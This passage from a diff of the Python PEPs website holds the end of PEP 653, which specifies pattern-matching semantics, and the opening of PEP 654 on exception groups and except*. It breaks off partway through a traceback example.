MATCH_MAPPING is used to indicate that instances of the class can match mapping patterns.

+
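
For illustration, a minimal sketch of a class opting in to sequence patterns. The Ring class is hypothetical, and the constant is defined locally because these attributes are proposed here and have no effect in current Python:

+
MATCH_SEQUENCE = 1  # the value specified above; defined only for this sketch
+
+class Ring:  # a hypothetical buffer, not registered with collections.abc.Sequence
+    __match_container__ = MATCH_SEQUENCE  # opt in to sequence patterns
+    def __init__(self, *items):
+        self._items = list(items)
+    def __len__(self):
+        return len(self._items)
+    def __getitem__(self, i):
+        return self._items[i]
+
+

Under the proposed semantics, case [x, y] would then match a two-item Ring without Ring being a collections.abc.Sequence subclass.

+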

__match_class__ must be an integer and should be exactly one of these:

+
0
+MATCH_SELF = 8
+
+
+

MATCH_SELF is used to indicate that, for a class pattern with a single positional argument, the subject itself will be used and not deconstructed.

+
+
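
Builtins such as float already behave this way under PEP 634, and this PEP preserves that, so the effect can be shown in current Python (3.10+):

+
match 2.5:
+    case float(x):  # "self" match: the subject itself is bound to x
+        print(x)    # prints 2.5; no attribute of the float is looked up
+
+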

Note

+

In the rest of this document, we will refer to the above values by name only. +Symbolic constants will be provided both for Python and C, and the values will +never be changed.

+
+

object will have the following values for the special attributes:

+
__match_container__ = 0
+__match_class__ = 0
+__match_args__ = ()
+
+
+

These special attributes will be inherited as normal.

+

If __match_args__ is overridden, then it is required to hold a tuple of unique strings. It may be empty.

+
+
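
For example, a class defining __match_args__ as required; this already works under PEP 634 and is unchanged by this PEP:

+
class Color:
+    __match_args__ = ("r", "g", "b")  # a tuple of unique strings
+    def __init__(self, r, g, b):
+        self.r, self.g, self.b = r, g, b
+
+match Color(0, 0, 255):
+    case Color(r, g, b):  # positional sub-patterns bind attributes "r", "g", "b"
+        print(r, g, b)    # 0 0 255
+
+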

Note

+

__match_args__ will be automatically generated for dataclasses and named tuples, as specified in PEP 634.

+
+

The pattern matching implementation is not required to check that any of these attributes behave as specified. +If the value of __match_container__, __match_class__ or __match_args__ is not as specified, then +the implementation may raise any exception, or match the wrong pattern. +Of course, implementations are free to check these properties and provide meaningful error messages if they can do so efficiently.

+
+
+

Semantics of the matching process

+

In the following, all variables of the form $var are temporary variables and are not visible to the Python program. +They may be visible via introspection, but that is an implementation detail and should not be relied on. +The pseudo-statement FAIL is used to signify that matching failed for this pattern and that matching should move to the next pattern. +If control reaches the end of the translation without reaching a FAIL, then it has matched, and following patterns are ignored.

+

Variables of the form $ALL_CAPS are meta-variables holding a syntactic element; they are not normal variables. +So, $VARS = $items is not an assignment of $items to $VARS, +but an unpacking of $items into the variables that $VARS holds. +For example, with the abstract syntax case [$VARS]: and the concrete syntax case [a, b]:, $VARS would hold the variables (a, b), +not the values of those variables.

+

The pseudo-function QUOTE takes a variable and returns the name of that variable. +For example, if the meta-variable $VAR held the variable foo then QUOTE($VAR) == "foo".

+

All additional code listed below that is not present in the original source will not trigger line events, conforming to PEP 626.

+
+

Preamble

+

Before any patterns are matched, the expression being matched is evaluated:

+
match expr:
+
+
+

translates to:

+
$value = expr
+
+
+
+
+

Capture patterns

+

Capture patterns always match, so the irrefutable match:

+
case capture_var:
+
+
+

translates to:

+
capture_var = $value
+
+
+
+
+

Wildcard patterns

+

Wildcard patterns always match, so:

+
case _:
+
+
+

translates to:

+
# No code -- Automatically matches
+
+
+
+
+

Literal Patterns

+

The literal pattern:

+
case LITERAL:
+
+
+

translates to:

+
if $value != LITERAL:
+    FAIL
+
+
+

except when the literal is one of None, True or False, +in which case it translates to:

+
if $value is not LITERAL:
+    FAIL
+
+
+
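
The distinction matters because equality and identity differ for these singletons. The following runs on current Python (PEP 634 keeps the same rule for these literals):

+
match 1:
+    case True:        # identity test: 1 is not True, so no match
+        print("True")
+    case 1:           # equality test: 1 == 1, so this matches
+        print("one")  # prints "one"
+
+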
+
+

Value Patterns

+

The value pattern:

+
case value.pattern:
+
+
+

translates to:

+
if $value != value.pattern:
+    FAIL
+
+
+
+
+

Sequence Patterns

+

A pattern not including a star pattern:

+
case [$VARS]:
+
+
+

translates to:

+
$kind = type($value).__match_container__
+if $kind != MATCH_SEQUENCE:
+    FAIL
+if len($value) != len($VARS):
+    FAIL
+$VARS = $value
+
+
+

Example: [2]

+

A pattern including a star pattern:

+
case [$VARS]:
+
+
+

translates to:

+
$kind = type($value).__match_container__
+if $kind != MATCH_SEQUENCE:
+    FAIL
+if len($value) < len($VARS):
+    FAIL
+$VARS = $value # Note that $VARS includes a star expression.
+
+
+

Example: [3]

+
+
+

Mapping Patterns

+

A pattern not including a double-star pattern:

+
case {$KEYWORD_PATTERNS}:
+
+
+

translates to:

+
$sentinel = object()
+$kind = type($value).__match_container__
+if $kind != MATCH_MAPPING:
+    FAIL
+# $KEYWORD_PATTERNS is a meta-variable mapping names to variables.
+for $KEYWORD in $KEYWORD_PATTERNS:
+    $tmp = $value.get(QUOTE($KEYWORD), $sentinel)
+    if $tmp is $sentinel:
+        FAIL
+    $KEYWORD_PATTERNS[$KEYWORD] = $tmp
+
+
+

Example: [4]

+

A pattern including a double-star pattern:

+
case {$KEYWORD_PATTERNS, **$DOUBLE_STARRED_PATTERN}:
+
+
+

translates to:

+
$kind = type($value).__match_container__
+if $kind != MATCH_MAPPING:
+    FAIL
+# $KEYWORD_PATTERNS is a meta-variable mapping names to variables.
+$tmp = dict($value)
+if not $tmp.keys() >= $KEYWORD_PATTERNS.keys():
+    FAIL
+for $KEYWORD in $KEYWORD_PATTERNS:
+    $KEYWORD_PATTERNS[$KEYWORD] = $tmp.pop(QUOTE($KEYWORD))
+$DOUBLE_STARRED_PATTERN = $tmp
+
+
+

Example: [5]

+
+
+

Class Patterns

+

Class pattern with no arguments:

+
case ClsName():
+
+
+

translates to:

+
if not isinstance($value, ClsName):
+    FAIL
+
+
+

Class pattern with a single positional pattern:

+
case ClsName($VAR):
+
+
+

translates to:

+
$kind = type($value).__match_class__
+if $kind == MATCH_SELF:
+    if not isinstance($value, ClsName):
+        FAIL
+    $VAR = $value
+else:
+    As for a positional-only class pattern (below)
+
+
+

Positional-only class pattern:

+
case ClsName($VARS):
+
+
+

translates to:

+
if not isinstance($value, ClsName):
+    FAIL
+$attrs = ClsName.__match_args__
+if len($attrs) < len($VARS):
+    raise TypeError(...)
+try:
+    for i, $VAR in enumerate($VARS):
+        $VAR = getattr($value, $attrs[i])
+except AttributeError:
+    FAIL
+
+
+

Example: [6]

+

Class patterns with all keyword patterns:

+
case ClsName($KEYWORD_PATTERNS):
+
+
+

translates to:

+
if not isinstance($value, ClsName):
+    FAIL
+try:
+    for $KEYWORD in $KEYWORD_PATTERNS:
+        $tmp = getattr($value, QUOTE($KEYWORD))
+        $KEYWORD_PATTERNS[$KEYWORD] = $tmp
+except AttributeError:
+    FAIL
+
+
+

Example: [7]

+

Class patterns with positional and keyword patterns:

+
case ClsName($VARS, $KEYWORD_PATTERNS):
+
+
+

translates to:

+
if not isinstance($value, ClsName):
+    FAIL
+$attrs = ClsName.__match_args__
+if len($attrs) < len($VARS):
+    raise TypeError(...)
+$pos_attrs = $attrs[:len($VARS)]
+try:
+    for i, $VAR in enumerate($VARS):
+        $VAR = getattr($value, $attrs[i])
+    for $KEYWORD in $KEYWORD_PATTERNS:
+        $name = QUOTE($KEYWORD)
+        if $name in $pos_attrs:
+            raise TypeError(...)
+        $KEYWORD_PATTERNS[$KEYWORD] = getattr($value, $name)
+except AttributeError:
+    FAIL
+
+
+

Example: [8]

+
+
+

Nested patterns

+

The above specification assumes that patterns are not nested. For nested patterns +the above translations are applied recursively by introducing temporary capture patterns.

+

For example, the pattern:

+
case [int(), str()]:
+
+
+

translates to:

+
$kind = type($value).__match_container__
+if $kind != MATCH_SEQUENCE:
+    FAIL
+if len($value) != 2:
+    FAIL
+$value_0, $value_1 = $value
+# Now match on temporary values
+if not isinstance($value_0, int):
+    FAIL
+if not isinstance($value_1, str):
+    FAIL
+
+
+
+
+

Guards

+

Guards translate to a test following the rest of the translation:

+
case pattern if guard:
+
+
+

translates to:

+
[translation for pattern]
+if not guard:
+    FAIL
+
+
+
+
+

Non-conforming special attributes

+

All classes should ensure that the values of __match_container__, __match_class__ +and __match_args__ follow the specification. +Therefore, implementations can assume, without checking, that the following are true:

+
__match_container__ == 0 or __match_container__ == MATCH_SEQUENCE or __match_container__ == MATCH_MAPPING
+__match_class__ == 0 or __match_class__ == MATCH_SELF
+
+
+

and that __match_args__ is a tuple of unique strings.

+
+
+
+

Values of the special attributes for classes in the standard library

+

For the core builtin container classes __match_container__ will be:

+
    +
  • list: MATCH_SEQUENCE
  • +
  • tuple: MATCH_SEQUENCE
  • +
  • dict: MATCH_MAPPING
  • +
  • bytearray: 0
  • +
  • bytes: 0
  • +
  • str: 0
  • +
+

Named tuples will have __match_container__ set to MATCH_SEQUENCE.

+
    +
  • All other standard library classes for which issubclass(cls, collections.abc.Mapping) is true will have __match_container__ set to MATCH_MAPPING.
  • +
  • All other standard library classes for which issubclass(cls, collections.abc.Sequence) is true will have __match_container__ set to MATCH_SEQUENCE.
  • +
+

For the following builtin classes __match_class__ will be set to MATCH_SELF:

+
    +
  • bool
  • +
  • bytearray
  • +
  • bytes
  • +
  • float
  • +
  • frozenset
  • +
  • int
  • +
  • set
  • +
  • str
  • +
  • list
  • +
  • tuple
  • +
  • dict
  • +
+
+ +
+
+

Security Implications

+

None.

+
+
+

Implementation

+

The naive implementation that follows from the specification will not be very efficient. +Fortunately, there are some reasonably straightforward transformations that can be used to improve performance. +Performance should be comparable to the implementation of PEP 634 (at time of writing) by the release of 3.10. +Further performance improvements may have to wait for the 3.11 release.

+
+

Possible optimizations

+

The following is not part of the specification, +but rather guidelines to help developers create an efficient implementation.

+
+

Splitting evaluation into lanes

+

Since the first step in matching each pattern is to check its kind, it is possible to combine all the kind checks into a single multi-way branch at the beginning +of the match. The list of cases can then be duplicated into several “lanes” each corresponding to one kind. +It is then trivial to remove unmatchable cases from each lane. +Depending on the kind, different optimization strategies are possible for each lane. +Note that the body of the match clause does not need to be duplicated, just the pattern.

+
+
+

Sequence patterns

+

This is probably the most complex to optimize and the most profitable in terms of performance. +Since each pattern can only match a range of lengths, often only a single length, +the sequence of tests can be rewritten as an explicit iteration over the sequence, +attempting to match only those patterns that apply to that sequence length.

+

For example:

+
case []:
+    A
+case [x]:
+    B
+case [x, y]:
+    C
+case other:
+    D
+
+
+

Can be compiled roughly as:

+
  # Choose lane
+  $i = iter($value)
+  for $0 in $i:
+      break
+  else:
+      A
+      goto done
+  for $1 in $i:
+      break
+  else:
+      x = $0
+      B
+      goto done
+  for $2 in $i:
+      del $0, $1, $2
+      break
+  else:
+      x = $0
+      y = $1
+      C
+      goto done
+  other = $value
+  D
+done:
+
+
+
+
+

Mapping patterns

+

The best strategy here is probably to form a decision tree based on the size of the mapping and which keys are present. +There is no point repeatedly testing for the presence of a key. +For example:

+
match obj:
+    case {a:x, b:y}:
+        W
+    case {a:x, c:y}:
+        X
+    case {a:x, b:_, c:y}:
+        Y
+    case other:
+        Z
+
+
+

If the key "a" is not present when checking for case X, there is no need to check it again for Y.

+

The mapping lane can be implemented roughly as:

+
# Choose lane
+if len($value) == 2:
+    if "a" in $value:
+        if "b" in $value:
+            x = $value["a"]
+            y = $value["b"]
+            goto W
+        if "c" in $value:
+            x = $value["a"]
+            y = $value["c"]
+            goto X
+elif len($value) == 3:
+    if "a" in $value and "b" in $value:
+        x = $value["a"]
+        y = $value["c"]
+        goto Y
+other = $value
+goto Z
+
+
+
+
+
+
+

Summary of differences between this PEP and PEP 634

+

The changes to the semantics can be summarized as:

+
    +
  • Requires __match_args__ to be a tuple of strings, not just a sequence. +This makes pattern matching a bit more robust and optimizable as __match_args__ can be assumed to be immutable.
  • +
  • Selecting the kind of container patterns that can be matched uses cls.__match_container__ instead of +issubclass(cls, collections.abc.Mapping) and issubclass(cls, collections.abc.Sequence).
  • +
  • Allows classes to opt out of deconstruction altogether, if necessary, by setting __match_class__ = 0 (see the sketch after this list).
  • +
  • The behavior when matching patterns is more precisely defined, but is otherwise unchanged.
  • +
+
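
A sketch of the opt-out mentioned above. The Row class is hypothetical and the attributes have no effect in current Python; under this PEP, a tuple subclass could reject the matching behavior it would otherwise inherit:

+
class Row(tuple):
+    __match_class__ = 0  # opt back out of the MATCH_SELF behavior of tuple
+    __match_args__ = ()  # any positional class pattern then raises TypeError
+
+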

There are no changes to syntax. All examples given in the PEP 636 tutorial should continue to work as they do now.

+
+
+

Rejected Ideas

+
+

Using attributes from the instance’s dictionary

+

An earlier version of this PEP used only attributes from the instance’s dictionary when matching a class pattern while __match_class__ had the default value. +The intent was to avoid capturing bound methods and other synthetic attributes. However, this also meant that properties were ignored.

+

For the class:

+
class C:
+    def __init__(self):
+        self.a = "a"
+    @property
+    def p(self):
+        ...
+    def m(self):
+        ...
+
+
+

Ideally we would match the attributes “a” and “p”, but not “m”. +However, there is no general way to do that, so this PEP now follows the semantics of PEP 634.

+
+
+

Lookup of __match_args__ on the subject, not the pattern

+

An earlier version of this PEP looked up __match_args__ on the class of the subject and +not the class specified in the pattern. +This has been rejected for a few reasons:

+
  • Using the class specified in the pattern is more amenable to optimization and can offer better performance.
  • +
  • Using the class specified in the pattern has the potential to provide better error reporting in some cases.
  • +
  • Neither approach is perfect; both have odd corner cases. Keeping the status quo minimizes disruption.
+
+
+
+
+

Combining __match_class__ and __match_container__ into a single value

+

An earlier version of this PEP combined __match_class__ and __match_container__ into a single value, __match_kind__. +Using a single value has a small advantage in terms of performance, +but is likely to result in unintended changes to container matching when overriding class matching behavior, and vice versa.

+
+
+
+

Deferred Ideas

+

The original version of this PEP included the match kind MATCH_POSITIONAL and special method +__deconstruct__ which would allow classes full control over their matching. This is important +for libraries like sympy.

+

For example, using sympy, we might want to write:

+
# sin(x)**2 + cos(x)**2 == 1
+case Add(Pow(sin(a), 2), Pow(cos(b), 2)) if a == b:
+    return 1
+
+
+

Supporting these positional patterns in sympy with current pattern matching is possible, +but tricky. With these additional features it can be implemented easily [9].

+

This idea will feature in a future PEP for 3.11. +However, it is too late in the 3.10 development cycle for such a change.

+
+

Having a separate value to reject all class matches

+

In an earlier version of this PEP, there was a distinct value for __match_class__ that allowed classes to not match any class +pattern that would have required deconstruction. However, this would become redundant once MATCH_POSITIONAL is introduced, and +it complicated the specification for an extremely rare case.

+
+
+
+

Code examples

+ +
class Symbol:
+    __match_class__ = MATCH_SELF
+
+
+ +

This:

+
case [a, b] if a is b:
+
+
+

translates to:

+
$kind = type($value).__match_container__
+if $kind != MATCH_SEQUENCE:
+    FAIL
+if len($value) != 2:
+    FAIL
+a, b = $value
+if a is not b:
+    FAIL
+
+
+ +

This:

+
case [a, *b, c]:
+
+
+

translates to:

+
$kind = type($value).__match_container__
+if $kind != MATCH_SEQUENCE:
+    FAIL
+if len($value) < 2:
+    FAIL
+a, *b, c = $value
+
+
+ +

This:

+
case {"x": x, "y": y} if x > 2:
+
+
+

translates to:

+
$sentinel = object()
+$kind = type($value).__match_container__
+if $kind != MATCH_MAPPING:
+    FAIL
+$tmp = $value.get("x", $sentinel)
+if $tmp is $sentinel:
+    FAIL
+x = $tmp
+$tmp = $value.get("y", $sentinel)
+if $tmp is $sentinel:
+    FAIL
+y = $tmp
+if not x > 2:
+    FAIL
+
+
+ +

This:

+
case {"x": x, "y": y, **z}:
+
+
+

translates to:

+
$kind = type($value).__match_container__
+if $kind != MATCH_MAPPING:
+    FAIL
+$tmp = dict($value)
+if not $tmp.keys() >= {"x", "y"}:
+    FAIL
+x = $tmp.pop("x")
+y = $tmp.pop("y")
+z = $tmp
+
+
+ +

This:

+
case ClsName(x, y):
+
+
+

translates to:

+
if not isinstance($value, ClsName):
+    FAIL
+$attrs = ClsName.__match_args__
+if len($attrs) < 2:
+    raise TypeError(...)
+try:
+    x = getattr($value, $attrs[0])
+    y = getattr($value, $attrs[1])
+except AttributeError:
+    FAIL
+
+
+ +

This:

+
case ClsName(a=x, b=y):
+
+
+

translates to:

+
if not isinstance($value, ClsName):
+    FAIL
+try:
+    x = $value.a
+    y = $value.b
+except AttributeError:
+    FAIL
+
+
+ +

This:

+
case ClsName(x, a=y):
+
+
+

translates to:

+
if not isinstance($value, ClsName):
+    FAIL
+$attrs = ClsName.__match_args__
+if len($attrs) < 1:
+    raise TypeError(...)
+$positional_names = $attrs[:1]
+try:
+    x = getattr($value, $attrs[0])
+    if "a" in $positional_names:
+        raise TypeError(...)
+    y = $value.a
+except AttributeError:
+    FAIL
+
+
+ +
class Basic:
+    __match_class__ = MATCH_POSITIONAL
+    def __deconstruct__(self):
+        return self._args
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0653.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0654/index.html b/pep-0654/index.html new file mode 100644 index 00000000000..0daff3a738d --- /dev/null +++ b/pep-0654/index.html @@ -0,0 +1,1569 @@ + PEP 654 – Exception Groups and except* | peps.python.org +
+
+


+ + +
+
+
+

PEP 654 – Exception Groups and except*

+
+
Author:
+
Irit Katriel <irit at python.org>, +Yury Selivanov <yury at edgedb.com>, +Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
22-Feb-2021
+
Python-Version:
+
3.11
+
Post-History:
+
22-Feb-2021, +20-Mar-2021, +03-Oct-2021
+
Resolution:
+
Discourse message
+
+
+
+
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at Exception groups and except* clause.

+


+

See Raising and Handling Multiple Unrelated Exceptions for a user-focused tutorial.

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

This document proposes language extensions that allow programs to raise and handle +multiple unrelated exceptions simultaneously:

+
    +
  • A new standard exception type, the ExceptionGroup, which represents a +group of unrelated exceptions being propagated together.
  • +
  • A new syntax except* for handling ExceptionGroups.
  • +
+
+
+

Motivation

+

The interpreter is currently able to propagate at most one exception at a +time. The chaining features introduced in PEP 3134 link together +exceptions that are related to each other as the cause or context, but +there are situations where multiple unrelated exceptions need to be propagated +together as the stack unwinds. Several real world use cases are listed below.

+
    +
  • Concurrent errors. Libraries for async concurrency provide APIs to invoke +multiple tasks and return their results in aggregate. There isn’t currently +a good way for such libraries to handle situations where multiple tasks +raise exceptions. The Python standard library’s asyncio.gather() [1] +function provides two options: raise the first exception, or return the +exceptions in the results list. The Trio [2] +library has a MultiError exception type which it raises to report a +collection of errors. Work on this PEP was initially motivated by the +difficulties in handling MultiErrors [9], which are detailed in a design +document for an improved version, MultiError2 [3]. +That document demonstrates how difficult it is to create an effective API +for reporting and handling multiple errors without the language changes we +are proposing (see also the Programming Without ‘except *’ section.)

    Implementing a better task spawning API in asyncio, inspired by Trio +nurseries [13], was the main motivation for this PEP. That work is currently +blocked on Python not having native language level support for exception +groups.

    +
  • +
  • Multiple failures when retrying an operation. The Python standard +library’s socket.create_connection function may attempt to connect to +different addresses, and if all attempts fail it needs to report that to the +user. It is an open issue how to aggregate these errors, particularly when +they are different (see issue 29980 [4].)
  • +
  • Multiple user callbacks fail. Python’s atexit.register() function +allows users to register functions that are called on system exit. If any of +them raise exceptions, only the last one is reraised, but it would be better +to reraise all of them together (see atexit documentation [5].) +Similarly, the pytest library allows users to register finalizers which +are executed at teardown. If more than one of these finalizers raises an +exception, only the first is reported to the user. This can be improved with +ExceptionGroups, as explained in this issue by pytest developer Ran Benita +(see pytest issue 8217 [6].)
  • +
  • Multiple errors in a complex calculation. The Hypothesis library performs +automatic bug reduction (simplifying code that demonstrates a bug). In the +process it may find variations that generate different errors, and +(optionally) reports all of them (see the Hypothesis documentation [7].) +An ExceptionGroup mechanism as we are proposing here can resolve some of +the difficulties with debugging that are mentioned in the link above, and +which are due to the loss of context/cause information (communicated +by Hypothesis Core Developer Zac Hatfield-Dodds).
  • +
  • Errors in wrapper code. The Python standard library’s +tempfile.TemporaryDirectory context manager +had an issue where an exception raised during cleanup in __exit__ +effectively masked an exception that the user’s code raised inside the context +manager scope. While the user’s exception was chained as the context of the +cleanup error, it was not caught by the user’s except clause +(see issue 40857 [8].)

    The issue was resolved by making the cleanup code ignore errors, thus +sidestepping the multiple exception problem. With the features we propose +here, it would be possible for __exit__ to raise an ExceptionGroup +containing its own errors along with the user’s errors, and this would allow +the user to catch their own exceptions by their types.

    +
  • +
+
+
+

Rationale

+

Grouping several exceptions together can be done without changes to the +language, simply by creating a container exception type. +Trio [2] is an example of a library that has made use of this technique in its +MultiError [9] type. However, such an approach requires calling code to catch +the container exception type, and then to inspect it to determine the types of +errors that had occurred, extract the ones it wants to handle, and reraise the +rest. Furthermore, exceptions in Python have important information attached to +their __traceback__, __cause__ and __context__ fields, and +designing a container type that preserves the integrity of this information +requires care; it is not as simple as collecting exceptions into a set.

+

Changes to the language are required in order to extend support for +exception groups in the style of existing exception handling mechanisms. At +the very least we would like to be able to catch an exception group only if +it contains an exception of a type that we choose to handle. Exceptions of +other types in the same group need to be automatically reraised, +otherwise it is too easy for user code to inadvertently swallow exceptions +that it is not handling.

+

We considered whether it is possible to modify the semantics of except +for this purpose, in a backwards-compatible manner, and found that it is not. +See the Rejected Ideas section for more on this.

+

The purpose of this PEP, then, is to add the ExceptionGroup builtin type +and the except* syntax for handling exception groups in the interpreter. +The desired semantics of except* are sufficiently different from the +current exception handling semantics that we are not proposing to modify the +behavior of the except keyword but rather to add the new except* +syntax.

+

Our premise is that exception groups and except* will be used +selectively, only when they are needed. We do not expect them to become +the default mechanism for exception handling. The decision to raise +exception groups from a library needs to be considered carefully and +regarded as an API-breaking change. We expect that this will normally be +done by introducing a new API rather than modifying an existing one.

+
+
+

Specification

+
+

ExceptionGroup and BaseExceptionGroup

+

We propose to add two new builtin exception types: +BaseExceptionGroup(BaseException) and +ExceptionGroup(BaseExceptionGroup, Exception). They are assignable to +Exception.__cause__ and Exception.__context__, and they can be +raised and handled as any exception with raise ExceptionGroup(...) and +try: ... except ExceptionGroup: ... or raise BaseExceptionGroup(...) +and try: ... except BaseExceptionGroup: ....

+

Both have a constructor that takes two positional-only arguments: a message +string and a sequence of the nested exceptions, which are exposed in the +fields message and exceptions. For example: +ExceptionGroup('issues', [ValueError('bad value'), TypeError('bad type')]). +The difference between them is that ExceptionGroup can only wrap +Exception subclasses while BaseExceptionGroup can wrap any +BaseException subclass. The BaseExceptionGroup constructor +inspects the nested exceptions and if they are all Exception subclasses, +it returns an ExceptionGroup rather than a BaseExceptionGroup. The +ExceptionGroup constructor raises a TypeError if any of the nested +exceptions is not an Exception instance. In the rest of the document, +when we refer to an exception group, we mean either an ExceptionGroup +or a BaseExceptionGroup. When it is necessary to make the distinction, +we use the class name. For brevity, we will use ExceptionGroup in code +examples that are relevant to both.

+
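
For example, on Python 3.11, where this PEP is implemented:

+
eg = BaseExceptionGroup("issues", [ValueError("bad value"), TypeError("bad type")])
+print(type(eg).__name__)   # ExceptionGroup: all nested exceptions are Exceptions
+beg = BaseExceptionGroup("fatal", [ValueError("bad value"), KeyboardInterrupt()])
+print(type(beg).__name__)  # BaseExceptionGroup
+
+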

Since an exception group can be nested, it represents a tree of exceptions, +where the leaves are plain exceptions and each internal node represents a time +at which the program grouped some unrelated exceptions into a new group and +raised them together.

+

The BaseExceptionGroup.subgroup(condition) method gives us a way to obtain +an exception group that has the same metadata (message, cause, context, +traceback) as the original group, and the same nested structure of groups, but +contains only those exceptions for which the condition is true:

+
>>> eg = ExceptionGroup(
+...     "one",
+...     [
+...         TypeError(1),
+...         ExceptionGroup(
+...             "two",
+...              [TypeError(2), ValueError(3)]
+...         ),
+...         ExceptionGroup(
+...              "three",
+...               [OSError(4)]
+...         )
+...     ]
+... )
+>>> import traceback
+>>> traceback.print_exception(eg)
+  | ExceptionGroup: one (3 sub-exceptions)
+  +-+---------------- 1 ----------------
+    | TypeError: 1
+    +---------------- 2 ----------------
+    | ExceptionGroup: two (2 sub-exceptions)
+    +-+---------------- 1 ----------------
+      | TypeError: 2
+      +---------------- 2 ----------------
+      | ValueError: 3
+      +------------------------------------
+    +---------------- 3 ----------------
+    | ExceptionGroup: three (1 sub-exception)
+    +-+---------------- 1 ----------------
+      | OSError: 4
+      +------------------------------------
+
+>>> type_errors = eg.subgroup(lambda e: isinstance(e, TypeError))
+>>> traceback.print_exception(type_errors)
+  | ExceptionGroup: one (2 sub-exceptions)
+  +-+---------------- 1 ----------------
+    | TypeError: 1
+    +---------------- 2 ----------------
+    | ExceptionGroup: two (1 sub-exception)
+    +-+---------------- 1 ----------------
+      | TypeError: 2
+      +------------------------------------
+>>>
+
+
+

The match condition is also applied to interior nodes (the exception +groups), and a match causes the whole subtree rooted at this node +to be included in the result.

+

Empty nested groups are omitted from the result, as in the +case of ExceptionGroup("three") in the example above. If none of the +exceptions match the condition, subgroup returns None rather +than an empty group. The original eg +is unchanged by subgroup, but the value returned is not necessarily a full +new copy. Leaf exceptions are not copied, nor are exception groups which are +fully contained in the result. When it is necessary to partition a +group because the condition holds for some, but not all of its +contained exceptions, a new ExceptionGroup or BaseExceptionGroup +instance is created, while the __cause__, __context__ and +__traceback__ fields are copied by reference, so they are shared with +the original eg.

+

If both the subgroup and its complement are needed, the +BaseExceptionGroup.split(condition) method can be used:

+
>>> type_errors, other_errors = eg.split(lambda e: isinstance(e, TypeError))
+>>> traceback.print_exception(type_errors)
+  | ExceptionGroup: one (2 sub-exceptions)
+  +-+---------------- 1 ----------------
+    | TypeError: 1
+    +---------------- 2 ----------------
+    | ExceptionGroup: two (1 sub-exception)
+    +-+---------------- 1 ----------------
+      | TypeError: 2
+      +------------------------------------
+>>> traceback.print_exception(other_errors)
+  | ExceptionGroup: one (2 sub-exceptions)
+  +-+---------------- 1 ----------------
+    | ExceptionGroup: two (1 sub-exception)
+    +-+---------------- 1 ----------------
+      | ValueError: 3
+      +------------------------------------
+    +---------------- 2 ----------------
+    | ExceptionGroup: three (1 sub-exception)
+    +-+---------------- 1 ----------------
+      | OSError: 4
+      +------------------------------------
+>>>
+
+
+

If a split is trivial (one side is empty), then None is returned for the +other side:

+
>>> other_errors.split(lambda e: isinstance(e, SyntaxError))
+(None, ExceptionGroup('one', [
+  ExceptionGroup('two', [
+    ValueError(3)
+  ]),
+  ExceptionGroup('three', [
+    OSError(4)])]))
+
+
+

Since splitting by exception type is a very common use case, subgroup and +split can take an exception type or tuple of exception types and treat it +as a shorthand for matching that type: eg.split(T) divides eg into the +subgroup of leaf exceptions that match the type T, and the subgroup of those +that do not (using the same check as except for a match).

+
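
For example, on Python 3.11+:

+
eg = ExceptionGroup("demo", [TypeError(1), ValueError(2), TypeError(3)])
+match, rest = eg.split(TypeError)  # an exception type as shorthand for the condition
+print(repr(match))  # ExceptionGroup('demo', [TypeError(1), TypeError(3)])
+print(repr(rest))   # ExceptionGroup('demo', [ValueError(2)])
+
+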
+

Subclassing Exception Groups

+

It is possible to subclass exception groups, but when doing that it is +usually necessary to specify how subgroup() and split() should +create new instances for the matching or non-matching part of the partition. +BaseExceptionGroup exposes an instance method derive(self, excs) +which is called whenever subgroup and split need to create a new +exception group. The parameter excs is the sequence of exceptions to +include in the new group. Since derive has access to self, it can +copy data from it to the new object. For example, if we need an exception +group subclass that has an additional error code field, we can do this:

+
class MyExceptionGroup(ExceptionGroup):
+    def __new__(cls, message, excs, errcode):
+        obj = super().__new__(cls, message, excs)
+        obj.errcode = errcode
+        return obj
+
+    def derive(self, excs):
+        return MyExceptionGroup(self.message, excs, self.errcode)
+
+
+

Note that we override __new__ rather than __init__; this is because +BaseExceptionGroup.__new__ needs to inspect the constructor arguments, and +its signature is different from that of the subclass. Note also that our +derive function does not copy the __context__, __cause__ and +__traceback__ fields, because subgroup and split do that for us.

+

With the class defined above, we have the following:

+
>>> eg = MyExceptionGroup("eg", [TypeError(1), ValueError(2)], 42)
+>>>
+>>> match, rest = eg.split(ValueError)
+>>> print(f'match: {match!r}: {match.errcode}')
+match: MyExceptionGroup('eg', [ValueError(2)], 42): 42
+>>> print(f'rest: {rest!r}: {rest.errcode}')
+rest: MyExceptionGroup('eg', [TypeError(1)], 42): 42
+>>>
+
+
+

If we do not override derive, then split calls the one defined +on BaseExceptionGroup, which returns an instance of ExceptionGroup +if all contained exceptions are of type Exception, and +BaseExceptionGroup otherwise. For example:

+
>>> class MyExceptionGroup(BaseExceptionGroup):
+...     pass
+...
+>>> eg = MyExceptionGroup("eg", [ValueError(1), KeyboardInterrupt(2)])
+>>> match, rest = eg.split(ValueError)
+>>> print(f'match: {match!r}')
+match: ExceptionGroup('eg', [ValueError(1)])
+>>> print(f'rest: {rest!r}')
+rest: BaseExceptionGroup('eg', [KeyboardInterrupt(2)])
+>>>
+
+
+
+
+

The Traceback of an Exception Group

+

For regular exceptions, the traceback represents a simple path of frames, +from the frame in which the exception was raised to the frame in which it +was caught or, if it hasn’t been caught yet, the frame that the program’s +execution is currently in. The list is constructed by the interpreter, which +appends any frame from which it exits to the traceback of the ‘current +exception’ if one exists. To support efficient appends, the links in a +traceback’s list of frames are from the oldest to the newest frame. Appending +a new frame is then simply a matter of inserting a new head to the linked +list referenced from the exception’s __traceback__ field. Crucially, the +traceback’s frame list is immutable in the sense that frames only need to be +added at the head, and never need to be removed.

+

We do not need to make any changes to this data structure. The __traceback__ +field of the exception group instance represents the path that the contained +exceptions travelled through together after being joined into the +group, and the same field on each of the nested exceptions +represents the path through which this exception arrived at the frame of the +merge.

+

What we do need to change is any code that interprets and displays tracebacks, +because it now needs to continue into tracebacks of nested exceptions, as +in the following example:

+
>>> def f(v):
+...     try:
+...         raise ValueError(v)
+...     except ValueError as e:
+...         return e
+...
+>>> try:
+...     raise ExceptionGroup("one", [f(1)])
+... except ExceptionGroup as e:
+...     eg = e
+...
